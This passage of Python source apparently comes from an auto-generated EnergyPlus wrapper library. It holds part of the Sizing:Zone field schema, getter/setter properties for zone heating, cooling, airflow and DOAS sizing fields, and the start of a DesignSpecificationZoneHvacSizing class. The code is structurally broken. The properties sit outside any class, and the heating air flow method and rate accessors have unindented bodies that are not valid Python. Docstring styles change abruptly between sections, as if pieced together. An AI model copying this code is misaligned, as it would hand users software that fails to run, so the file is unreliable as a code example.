                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kgWater/kgDryAir'}),
                                      (u'zone heating design supply air humidity ratio',
                                       {'name': u'Zone Heating Design Supply Air Humidity Ratio',
                                        'pyname': u'zone_heating_design_supply_air_humidity_ratio',
                                        'required-field': True,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kgWater/kgDryAir'}),
                                      (u'design specification outdoor air object name',
                                       {'name': u'Design Specification Outdoor Air Object Name',
                                        'pyname': u'design_specification_outdoor_air_object_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      # -- zone-level sizing factors --
                                      (u'zone heating sizing factor',
                                       {'name': u'Zone Heating Sizing Factor',
                                        'pyname': u'zone_heating_sizing_factor',
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': 'real'}),
                                      (u'zone cooling sizing factor',
                                       {'name': u'Zone Cooling Sizing Factor',
                                        'pyname': u'zone_cooling_sizing_factor',
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': 'real'}),
                                      # -- cooling design air flow --
                                      (u'cooling design air flow method',
                                       {'name': u'Cooling Design Air Flow Method',
                                        'pyname': u'cooling_design_air_flow_method',
                                        'default': u'DesignDay',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Flow/Zone',
                                                            u'DesignDay',
                                                            u'DesignDayWithLimit'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'cooling design air flow rate',
                                       {'name': u'Cooling Design Air Flow Rate',
                                        'pyname': u'cooling_design_air_flow_rate',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'cooling minimum air flow per zone floor area',
                                       {'name': u'Cooling Minimum Air Flow per Zone Floor Area',
                                        'pyname': u'cooling_minimum_air_flow_per_zone_floor_area',
                                        'default': 0.000762,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s-m2'}),
                                      (u'cooling minimum air flow',
                                       {'name': u'Cooling Minimum Air Flow',
                                        'pyname': u'cooling_minimum_air_flow',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'cooling minimum air flow fraction',
                                       {'name': u'Cooling Minimum Air Flow Fraction',
                                        'pyname': u'cooling_minimum_air_flow_fraction',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      # -- heating design air flow --
                                      (u'heating design air flow method',
                                       {'name': u'Heating Design Air Flow Method',
                                        'pyname': u'heating_design_air_flow_method',
                                        'default': u'DesignDay',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Flow/Zone',
                                                            u'DesignDay',
                                                            u'DesignDayWithLimit'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'heating design air flow rate',
                                       {'name': u'Heating Design Air Flow Rate',
                                        'pyname': u'heating_design_air_flow_rate',
                                        'default': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'heating maximum air flow per zone floor area',
                                       {'name': u'Heating Maximum Air Flow per Zone Floor Area',
                                        'pyname': u'heating_maximum_air_flow_per_zone_floor_area',
                                        'default': 0.002032,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s-m2'}),
                                      (u'heating maximum air flow',
                                       {'name': u'Heating Maximum Air Flow',
                                        'pyname': u'heating_maximum_air_flow',
                                        'default': 0.1415762,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm3/s'}),
                                      (u'heating maximum air flow fraction',
                                       {'name': u'Heating Maximum Air Flow Fraction',
                                        'pyname': u'heating_maximum_air_flow_fraction',
                                        'default': 0.3,
                                        'required-field': False,
                                        'autosizable': False,
                                        'minimum': 0.0,
                                        'autocalculatable': False,
                                        'type': u'real'}),
                                      (u'design specification zone air distribution object name',
                                       {'name': u'Design Specification Zone Air Distribution Object Name',
                                        'pyname': u'design_specification_zone_air_distribution_object_name',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'object-list'}),
                                      # -- dedicated outdoor air system (DOAS) --
                                      (u'account for dedicated outdoor air system',
                                       {'name': u'Account for Dedicated Outdoor Air System',
                                        'pyname': u'account_for_dedicated_outdoor_air_system',
                                        'default': u'No',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'Yes',
                                                            u'No'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'dedicated outdoor air system control strategy',
                                       {'name': u'Dedicated Outdoor Air System Control Strategy',
                                        'pyname': u'dedicated_outdoor_air_system_control_strategy',
                                        'default': u'NeutralSupplyAir',
                                        'required-field': False,
                                        'autosizable': False,
                                        'accepted-values': [u'NeutralSupplyAir',
                                                            u'NeutralDehumidifiedSupplyAir',
                                                            u'ColdSupplyAir'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'dedicated outdoor air low setpoint temperature for design',
                                       {'name': u'Dedicated Outdoor Air Low Setpoint Temperature for Design',
                                        'pyname': u'dedicated_outdoor_air_low_setpoint_temperature_for_design',
                                        'default': 'autosize',
                                        'required-field': False,
                                        'autosizable': True,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'C'}),
                                      (u'dedicated outdoor air high setpoint temperature for design',
                                       {'name': u'Dedicated Outdoor Air High Setpoint Temperature for Design',
                                        'pyname': u'dedicated_outdoor_air_high_setpoint_temperature_for_design',
                                        'default': 'autosize',
                                        'required-field': False,
                                        'autosizable': True,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'C'})]),
               'format': None,
               'group': u'HVAC Design Objects',
               'min-fields': 18,
               'name': u'Sizing:Zone',
               'pyname': u'SizingZone',
               'required-object': False,
               'unique-object': False}
@property
def zone_or_zonelist_name(self):
    """IDD field `Zone or ZoneList Name`.

    Returns:
        str: the stored name, or None when the field is unset.
    """
    field_key = "Zone or ZoneList Name"
    return self[field_key]

@zone_or_zonelist_name.setter
def zone_or_zonelist_name(self, value=None):
    """Set the IDD field `Zone or ZoneList Name`.

    Args:
        value (str): new value; validation may raise ValueError.
    """
    field_key = "Zone or ZoneList Name"
    self[field_key] = value
@property
def zone_cooling_design_supply_air_temperature_input_method(self):
    """IDD field `Zone Cooling Design Supply Air Temperature Input Method`.

    Default value: SupplyAirTemperature

    Returns:
        str: the stored value, or None when the field is unset.
    """
    field_key = "Zone Cooling Design Supply Air Temperature Input Method"
    return self[field_key]

@zone_cooling_design_supply_air_temperature_input_method.setter
def zone_cooling_design_supply_air_temperature_input_method(self, value="SupplyAirTemperature"):
    """Set the IDD field `Zone Cooling Design Supply Air Temperature Input
    Method`."""
    field_key = "Zone Cooling Design Supply Air Temperature Input Method"
    self[field_key] = value

@property
def zone_cooling_design_supply_air_temperature(self):
    """IDD field `Zone Cooling Design Supply Air Temperature`.

    Only used when Zone Cooling Design Supply Air Temperature Input Method
    is SupplyAirTemperature.

    Units: C

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Zone Cooling Design Supply Air Temperature"
    return self[field_key]

@zone_cooling_design_supply_air_temperature.setter
def zone_cooling_design_supply_air_temperature(self, value=None):
    """Set the IDD field `Zone Cooling Design Supply Air Temperature`."""
    field_key = "Zone Cooling Design Supply Air Temperature"
    self[field_key] = value

@property
def zone_cooling_design_supply_air_temperature_difference(self):
    """IDD field `Zone Cooling Design Supply Air Temperature Difference`.

    Only used when Zone Cooling Design Supply Air Temperature Input Method
    is TemperatureDifference.  The absolute value of this field will be
    subtracted from the zone temperature at peak load to calculate the Zone
    Cooling Design Supply Air Temperature.

    Units: deltaC

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Zone Cooling Design Supply Air Temperature Difference"
    return self[field_key]

@zone_cooling_design_supply_air_temperature_difference.setter
def zone_cooling_design_supply_air_temperature_difference(self, value=None):
    """Set the IDD field `Zone Cooling Design Supply Air Temperature
    Difference`."""
    field_key = "Zone Cooling Design Supply Air Temperature Difference"
    self[field_key] = value
@property
def zone_heating_design_supply_air_temperature_input_method(self):
    """IDD field `Zone Heating Design Supply Air Temperature Input Method`.

    Default value: SupplyAirTemperature

    Returns:
        str: the stored value, or None when the field is unset.
    """
    field_key = "Zone Heating Design Supply Air Temperature Input Method"
    return self[field_key]

@zone_heating_design_supply_air_temperature_input_method.setter
def zone_heating_design_supply_air_temperature_input_method(self, value="SupplyAirTemperature"):
    """Set the IDD field `Zone Heating Design Supply Air Temperature Input
    Method`."""
    field_key = "Zone Heating Design Supply Air Temperature Input Method"
    self[field_key] = value

@property
def zone_heating_design_supply_air_temperature(self):
    """IDD field `Zone Heating Design Supply Air Temperature`.

    Only used when Zone Heating Design Supply Air Temperature Input Method
    is SupplyAirTemperature.

    Units: C

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Zone Heating Design Supply Air Temperature"
    return self[field_key]

@zone_heating_design_supply_air_temperature.setter
def zone_heating_design_supply_air_temperature(self, value=None):
    """Set the IDD field `Zone Heating Design Supply Air Temperature`."""
    field_key = "Zone Heating Design Supply Air Temperature"
    self[field_key] = value

@property
def zone_heating_design_supply_air_temperature_difference(self):
    """IDD field `Zone Heating Design Supply Air Temperature Difference`.

    Only used when Zone Heating Design Supply Air Temperature Input Method
    is TemperatureDifference.  The absolute value of this field will be
    added to the zone temperature at peak load to calculate the Zone
    Heating Design Supply Air Temperature.

    Units: deltaC

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Zone Heating Design Supply Air Temperature Difference"
    return self[field_key]

@zone_heating_design_supply_air_temperature_difference.setter
def zone_heating_design_supply_air_temperature_difference(self, value=None):
    """Set the IDD field `Zone Heating Design Supply Air Temperature
    Difference`."""
    field_key = "Zone Heating Design Supply Air Temperature Difference"
    self[field_key] = value
@property
def zone_cooling_design_supply_air_humidity_ratio(self):
    """IDD field `Zone Cooling Design Supply Air Humidity Ratio`.

    Units: kgWater/kgDryAir

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Zone Cooling Design Supply Air Humidity Ratio"
    return self[field_key]

@zone_cooling_design_supply_air_humidity_ratio.setter
def zone_cooling_design_supply_air_humidity_ratio(self, value=None):
    """Set the IDD field `Zone Cooling Design Supply Air Humidity Ratio`."""
    field_key = "Zone Cooling Design Supply Air Humidity Ratio"
    self[field_key] = value

@property
def zone_heating_design_supply_air_humidity_ratio(self):
    """IDD field `Zone Heating Design Supply Air Humidity Ratio`.

    Units: kgWater/kgDryAir

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Zone Heating Design Supply Air Humidity Ratio"
    return self[field_key]

@zone_heating_design_supply_air_humidity_ratio.setter
def zone_heating_design_supply_air_humidity_ratio(self, value=None):
    """Set the IDD field `Zone Heating Design Supply Air Humidity Ratio`."""
    field_key = "Zone Heating Design Supply Air Humidity Ratio"
    self[field_key] = value
@property
def design_specification_outdoor_air_object_name(self):
    """IDD field `Design Specification Outdoor Air Object Name`.

    Returns:
        str: the stored object name, or None when the field is unset.
    """
    field_key = "Design Specification Outdoor Air Object Name"
    return self[field_key]

@design_specification_outdoor_air_object_name.setter
def design_specification_outdoor_air_object_name(self, value=None):
    """Set the IDD field `Design Specification Outdoor Air Object Name`.

    Args:
        value (str): new value; validation may raise ValueError.
    """
    field_key = "Design Specification Outdoor Air Object Name"
    self[field_key] = value
@property
def zone_heating_sizing_factor(self):
    """IDD field `Zone Heating Sizing Factor`.

    If blank or zero, the global heating sizing factor from
    Sizing:Parameters is used.

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Zone Heating Sizing Factor"
    return self[field_key]

@zone_heating_sizing_factor.setter
def zone_heating_sizing_factor(self, value=None):
    """Set the IDD field `Zone Heating Sizing Factor`."""
    field_key = "Zone Heating Sizing Factor"
    self[field_key] = value

@property
def zone_cooling_sizing_factor(self):
    """IDD field `Zone Cooling Sizing Factor`.

    If blank or zero, the global cooling sizing factor from
    Sizing:Parameters is used.

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Zone Cooling Sizing Factor"
    return self[field_key]

@zone_cooling_sizing_factor.setter
def zone_cooling_sizing_factor(self, value=None):
    """Set the IDD field `Zone Cooling Sizing Factor`."""
    field_key = "Zone Cooling Sizing Factor"
    self[field_key] = value
@property
def cooling_design_air_flow_method(self):
    """IDD field `Cooling Design Air Flow Method`.

    Default value: DesignDay

    Returns:
        str: the stored value, or None when the field is unset.
    """
    field_key = "Cooling Design Air Flow Method"
    return self[field_key]

@cooling_design_air_flow_method.setter
def cooling_design_air_flow_method(self, value="DesignDay"):
    """Set the IDD field `Cooling Design Air Flow Method`."""
    field_key = "Cooling Design Air Flow Method"
    self[field_key] = value

@property
def cooling_design_air_flow_rate(self):
    """IDD field `Cooling Design Air Flow Rate`.

    Used if Cooling Design Air Flow Method is Flow/Zone.  This value will
    be multiplied by the global or zone sizing factor and by zone
    multipliers.

    Units: m3/s

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Cooling Design Air Flow Rate"
    return self[field_key]

@cooling_design_air_flow_rate.setter
def cooling_design_air_flow_rate(self, value=None):
    """Set the IDD field `Cooling Design Air Flow Rate`."""
    field_key = "Cooling Design Air Flow Rate"
    self[field_key] = value

@property
def cooling_minimum_air_flow_per_zone_floor_area(self):
    """IDD field `Cooling Minimum Air Flow per Zone Floor Area`.

    Used if Cooling Design Air Flow Method is DesignDayWithLimit.
    The default, 0.000762 m3/s-m2, is .15 cfm/ft2.

    Units: m3/s-m2

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Cooling Minimum Air Flow per Zone Floor Area"
    return self[field_key]

@cooling_minimum_air_flow_per_zone_floor_area.setter
def cooling_minimum_air_flow_per_zone_floor_area(self, value=0.000762):
    """Set the IDD field `Cooling Minimum Air Flow per Zone Floor Area`."""
    field_key = "Cooling Minimum Air Flow per Zone Floor Area"
    self[field_key] = value

@property
def cooling_minimum_air_flow(self):
    """IDD field `Cooling Minimum Air Flow`.

    Used if Cooling Design Air Flow Method is DesignDayWithLimit.

    Units: m3/s

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Cooling Minimum Air Flow"
    return self[field_key]

@cooling_minimum_air_flow.setter
def cooling_minimum_air_flow(self, value=None):
    """Set the IDD field `Cooling Minimum Air Flow`."""
    field_key = "Cooling Minimum Air Flow"
    self[field_key] = value

@property
def cooling_minimum_air_flow_fraction(self):
    """IDD field `Cooling Minimum Air Flow Fraction`.

    Fraction of the Cooling design Air Flow Rate.  Currently used in sizing
    the Fan minimum Flow Rate; it does not currently affect other component
    autosizing.

    Returns:
        float: the stored value, or None when the field is unset.
    """
    field_key = "Cooling Minimum Air Flow Fraction"
    return self[field_key]

@cooling_minimum_air_flow_fraction.setter
def cooling_minimum_air_flow_fraction(self, value=None):
    """Set the IDD field `Cooling Minimum Air Flow Fraction`."""
    field_key = "Cooling Minimum Air Flow Fraction"
    self[field_key] = value
@property
def heating_design_air_flow_method(self):
"""field `Heating Design Air Flow Method`
| Default value: DesignDay
Args:
value (str): value for IDD Field `Heating Design Air Flow Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_design_air_flow_method` or None if not set
"""
return self["Heating Design Air Flow Method"]
@heating_design_air_flow_method.setter
def heating_design_air_flow_method(self, value="DesignDay"):
"""Corresponds to IDD field `Heating Design Air Flow Method`"""
self["Heating Design Air Flow Method"] = value
@property
def heating_design_air_flow_rate(self):
"""field `Heating Design Air Flow Rate`
| This input is used if Heating Design Air Flow Method is Flow/Zone.
| This value will be multiplied by the global or zone sizing factor and
| by zone multipliers.
| Units: m3/s
Args:
value (float): value for IDD Field `Heating Design Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_design_air_flow_rate` or None if not set
"""
return self["Heating Design Air Flow Rate"]
@heating_design_air_flow_rate.setter
def heating_design_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Design Air Flow Rate`"""
self["Heating Design Air Flow Rate"] = value
@property
def heating_maximum_air_flow_per_zone_floor_area(self):
    """Get IDD field `Heating Maximum Air Flow per Zone Floor Area`.

    Default 0.002032 m3/s-m2 (.40 cfm/ft2).  Sizes the heating design
    flow rate when Heating Design Air Flow Method = Flow/Zone, and feeds
    component autosizing when the method is DesignDayWithLimit.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Heating Maximum Air Flow per Zone Floor Area"
    return self[field]

@heating_maximum_air_flow_per_zone_floor_area.setter
def heating_maximum_air_flow_per_zone_floor_area(self, value=0.002032):
    """Set IDD field `Heating Maximum Air Flow per Zone Floor Area` (m3/s-m2)."""
    self["Heating Maximum Air Flow per Zone Floor Area"] = value
@property
def heating_maximum_air_flow(self):
    """Get IDD field `Heating Maximum Air Flow`.

    Default 0.1415762 m3/s (300 cfm).  Used for autosizing components
    when Heating Design Air Flow Method = DesignDayWithLimit.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Heating Maximum Air Flow"
    return self[field]

@heating_maximum_air_flow.setter
def heating_maximum_air_flow(self, value=0.1415762):
    """Set IDD field `Heating Maximum Air Flow` (m3/s)."""
    self["Heating Maximum Air Flow"] = value
@property
def heating_maximum_air_flow_fraction(self):
    """Get IDD field `Heating Maximum Air Flow Fraction`.

    Fraction of the Heating Design Air Flow Rate (default 0.3).  Used
    for autosizing components when Heating Design Air Flow Method =
    DesignDayWithLimit.

    Returns:
        float: the stored value, or None if not set.
    """
    field = "Heating Maximum Air Flow Fraction"
    return self[field]

@heating_maximum_air_flow_fraction.setter
def heating_maximum_air_flow_fraction(self, value=0.3):
    """Set IDD field `Heating Maximum Air Flow Fraction`."""
    self["Heating Maximum Air Flow Fraction"] = value
@property
def design_specification_zone_air_distribution_object_name(self):
    """Get IDD field `Design Specification Zone Air Distribution Object Name`.

    Returns:
        str: the stored value, or None if not set.
    """
    field = "Design Specification Zone Air Distribution Object Name"
    return self[field]

@design_specification_zone_air_distribution_object_name.setter
def design_specification_zone_air_distribution_object_name(self, value=None):
    """Set IDD field `Design Specification Zone Air Distribution Object Name`."""
    self["Design Specification Zone Air Distribution Object Name"] = value
@property
def account_for_dedicated_outdoor_air_system(self):
    """Get IDD field `Account for Dedicated Outdoor Air System`.

    Whether to account for the effect of a dedicated outdoor air system
    supplying air directly to the zone.  Default "No".

    Returns:
        str: the stored value, or None if not set.
    """
    field = "Account for Dedicated Outdoor Air System"
    return self[field]

@account_for_dedicated_outdoor_air_system.setter
def account_for_dedicated_outdoor_air_system(self, value="No"):
    """Set IDD field `Account for Dedicated Outdoor Air System`."""
    self["Account for Dedicated Outdoor Air System"] = value
@property
def dedicated_outdoor_air_system_control_strategy(self):
    """Get IDD field `Dedicated Outdoor Air System Control Strategy`.

    Strategy options: 1) supply neutral ventilation air; 2) supply
    neutral dehumidified and reheated ventilation air; 3) supply cold
    ventilation air.  Default "NeutralSupplyAir".

    Returns:
        str: the stored value, or None if not set.
    """
    field = "Dedicated Outdoor Air System Control Strategy"
    return self[field]

@dedicated_outdoor_air_system_control_strategy.setter
def dedicated_outdoor_air_system_control_strategy(self, value="NeutralSupplyAir"):
    """Set IDD field `Dedicated Outdoor Air System Control Strategy`."""
    self["Dedicated Outdoor Air System Control Strategy"] = value
@property
def dedicated_outdoor_air_low_setpoint_temperature_for_design(self):
    """Get IDD field `Dedicated Outdoor Air Low Setpoint Temperature for Design`.

    Units: C.  Default "autosize".

    Returns:
        float or "Autosize": the stored value, or None if not set.
    """
    field = "Dedicated Outdoor Air Low Setpoint Temperature for Design"
    return self[field]

@dedicated_outdoor_air_low_setpoint_temperature_for_design.setter
def dedicated_outdoor_air_low_setpoint_temperature_for_design(self, value="autosize"):
    """Set IDD field `Dedicated Outdoor Air Low Setpoint Temperature for Design` (C)."""
    self["Dedicated Outdoor Air Low Setpoint Temperature for Design"] = value
@property
def dedicated_outdoor_air_high_setpoint_temperature_for_design(self):
    """Get IDD field `Dedicated Outdoor Air High Setpoint Temperature for Design`.

    Units: C.  Default "autosize".

    Returns:
        float or "Autosize": the stored value, or None if not set.
    """
    field = "Dedicated Outdoor Air High Setpoint Temperature for Design"
    return self[field]

@dedicated_outdoor_air_high_setpoint_temperature_for_design.setter
def dedicated_outdoor_air_high_setpoint_temperature_for_design(self, value="autosize"):
    """Set IDD field `Dedicated Outdoor Air High Setpoint Temperature for Design` (C)."""
    self["Dedicated Outdoor Air High Setpoint Temperature for Design"] = value
class DesignSpecificationZoneHvacSizing(DataObject):
""" Corresponds to IDD object `DesignSpecification:ZoneHVAC:Sizing`
This object is used to describe general scalable zone HVAC equipment sizing which
are referenced by other objects.
"""
# Auto-generated IDD schema for object `DesignSpecification:ZoneHVAC:Sizing`.
# Maps each IDD field name to its metadata (python attribute name, default,
# accepted values, numeric limits, units) consumed by the DataObject base
# class for field lookup and validation.  Do not edit by hand.
_schema = {'extensible-fields': OrderedDict(),
           'fields': OrderedDict([(u'name',
                                   {'name': u'Name',
                                    'pyname': u'name',
                                    'required-field': True,
                                    'autosizable': False,
                                    'autocalculatable': False,
                                    'type': u'alpha'}),
                                  (u'cooling supply air flow rate method',
                                   {'name': u'Cooling Supply Air Flow Rate Method',
                                    'pyname': u'cooling_supply_air_flow_rate_method',
                                    'default': u'SupplyAirFlowRate',
                                    'required-field': False,
                                    'autosizable': False,
                                    'accepted-values': [u'None',
                                                        u'SupplyAirFlowRate',
                                                        u'FlowPerFloorArea',
                                                        u'FractionOfAutosizedCoolingAirflow',
                                                        u'FlowPerCoolingCapacity'],
                                    'autocalculatable': False,
                                    'type': 'alpha'}),
                                  (u'cooling supply air flow rate',
                                   {'name': u'Cooling Supply Air Flow Rate',
                                    'pyname': u'cooling_supply_air_flow_rate',
                                    'required-field': False,
                                    'autosizable': True,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm3/s'}),
                                  (u'cooling supply air flow rate per floor area',
                                   {'name': u'Cooling Supply Air Flow Rate Per Floor Area',
                                    'pyname': u'cooling_supply_air_flow_rate_per_floor_area',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm3/s-m2'}),
                                  (u'cooling fraction of autosized cooling supply air flow rate',
                                   {'name': u'Cooling Fraction of Autosized Cooling Supply Air Flow Rate',
                                    'pyname': u'cooling_fraction_of_autosized_cooling_supply_air_flow_rate',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real'}),
                                  (u'cooling supply air flow rate per unit cooling capacity',
                                   {'name': u'Cooling Supply Air Flow Rate Per Unit Cooling Capacity',
                                    'pyname': u'cooling_supply_air_flow_rate_per_unit_cooling_capacity',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm3/s-W'}),
                                  (u'no load supply air flow rate method',
                                   {'name': u'No Load Supply Air Flow Rate Method',
                                    'pyname': u'no_load_supply_air_flow_rate_method',
                                    'default': u'SupplyAirFlowRate',
                                    'required-field': False,
                                    'autosizable': False,
                                    'accepted-values': [u'None',
                                                        u'SupplyAirFlowRate',
                                                        u'FlowPerFloorArea',
                                                        u'FractionOfAutosizedCoolingAirflow',
                                                        u'FractionOfAutosizedHeatingAirflow'],
                                    'autocalculatable': False,
                                    'type': 'alpha'}),
                                  (u'no load supply air flow rate',
                                   {'name': u'No Load Supply Air Flow Rate',
                                    'pyname': u'no_load_supply_air_flow_rate',
                                    'required-field': False,
                                    'autosizable': True,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm3/s'}),
                                  (u'no load supply air flow rate per floor area',
                                   {'name': u'No Load Supply Air Flow Rate Per Floor Area',
                                    'pyname': u'no_load_supply_air_flow_rate_per_floor_area',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm3/s-m2'}),
                                  (u'no load fraction of cooling supply air flow rate',
                                   {'name': u'No Load Fraction of Cooling Supply Air Flow Rate',
                                    'pyname': u'no_load_fraction_of_cooling_supply_air_flow_rate',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real'}),
                                  (u'no load fraction of heating supply air flow rate',
                                   {'name': u'No Load Fraction of Heating Supply Air Flow Rate',
                                    'pyname': u'no_load_fraction_of_heating_supply_air_flow_rate',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real'}),
                                  (u'heating supply air flow rate method',
                                   {'name': u'Heating Supply Air Flow Rate Method',
                                    'pyname': u'heating_supply_air_flow_rate_method',
                                    'default': u'SupplyAirFlowRate',
                                    'required-field': False,
                                    'autosizable': False,
                                    'accepted-values': [u'None',
                                                        u'SupplyAirFlowRate',
                                                        u'FlowPerFloorArea',
                                                        u'FractionOfAutosizedHeatingAirflow',
                                                        u'FlowPerHeatingCapacity'],
                                    'autocalculatable': False,
                                    'type': 'alpha'}),
                                  (u'heating supply air flow rate',
                                   {'name': u'Heating Supply Air Flow Rate',
                                    'pyname': u'heating_supply_air_flow_rate',
                                    'required-field': False,
                                    'autosizable': True,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm3/s'}),
                                  (u'heating supply air flow rate per floor area',
                                   {'name': u'Heating Supply Air Flow Rate Per Floor Area',
                                    'pyname': u'heating_supply_air_flow_rate_per_floor_area',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm3/s-m2'}),
                                  (u'heating fraction of heating supply air flow rate',
                                   {'name': u'Heating Fraction of Heating Supply Air Flow Rate',
                                    'pyname': u'heating_fraction_of_heating_supply_air_flow_rate',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real'}),
                                  (u'heating supply air flow rate per unit heating capacity',
                                   {'name': u'Heating Supply Air Flow Rate Per Unit Heating Capacity',
                                    'pyname': u'heating_supply_air_flow_rate_per_unit_heating_capacity',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'm3/s-W'}),
                                  (u'cooling design capacity method',
                                   {'name': u'Cooling Design Capacity Method',
                                    'pyname': u'cooling_design_capacity_method',
                                    'default': u'None',
                                    'required-field': False,
                                    'autosizable': False,
                                    'accepted-values': [u'None',
                                                        u'CoolingDesignCapacity',
                                                        u'CapacityPerFloorArea',
                                                        u'FractionOfAutosizedCoolingCapacity'],
                                    'autocalculatable': False,
                                    'type': 'alpha'}),
                                  (u'cooling design capacity',
                                   {'name': u'Cooling Design Capacity',
                                    'pyname': u'cooling_design_capacity',
                                    'required-field': False,
                                    'autosizable': True,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'W'}),
                                  (u'cooling design capacity per floor area',
                                   {'name': u'Cooling Design Capacity Per Floor Area',
                                    'pyname': u'cooling_design_capacity_per_floor_area',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'W/m2'}),
                                  (u'fraction of autosized cooling design capacity',
                                   {'name': u'Fraction of Autosized Cooling Design Capacity',
                                    'pyname': u'fraction_of_autosized_cooling_design_capacity',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real'}),
                                  (u'heating design capacity method',
                                   {'name': u'Heating Design Capacity Method',
                                    'pyname': u'heating_design_capacity_method',
                                    'default': u'None',
                                    'required-field': False,
                                    'autosizable': False,
                                    'accepted-values': [u'None',
                                                        u'HeatingDesignCapacity',
                                                        u'CapacityPerFloorArea',
                                                        u'FractionOfAutosizedHeatingCapacity'],
                                    'autocalculatable': False,
                                    'type': 'alpha'}),
                                  (u'heating design capacity',
                                   {'name': u'Heating Design Capacity',
                                    'pyname': u'heating_design_capacity',
                                    'required-field': False,
                                    'autosizable': True,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'W'}),
                                  (u'heating design capacity per floor area',
                                   {'name': u'Heating Design Capacity Per Floor Area',
                                    'pyname': u'heating_design_capacity_per_floor_area',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real',
                                    'unit': u'W/m2'}),
                                  (u'fraction of autosized heating design capacity',
                                   {'name': u'Fraction of Autosized Heating Design Capacity',
                                    'pyname': u'fraction_of_autosized_heating_design_capacity',
                                    'required-field': False,
                                    'autosizable': False,
                                    'minimum': 0.0,
                                    'autocalculatable': False,
                                    'type': u'real'})]),
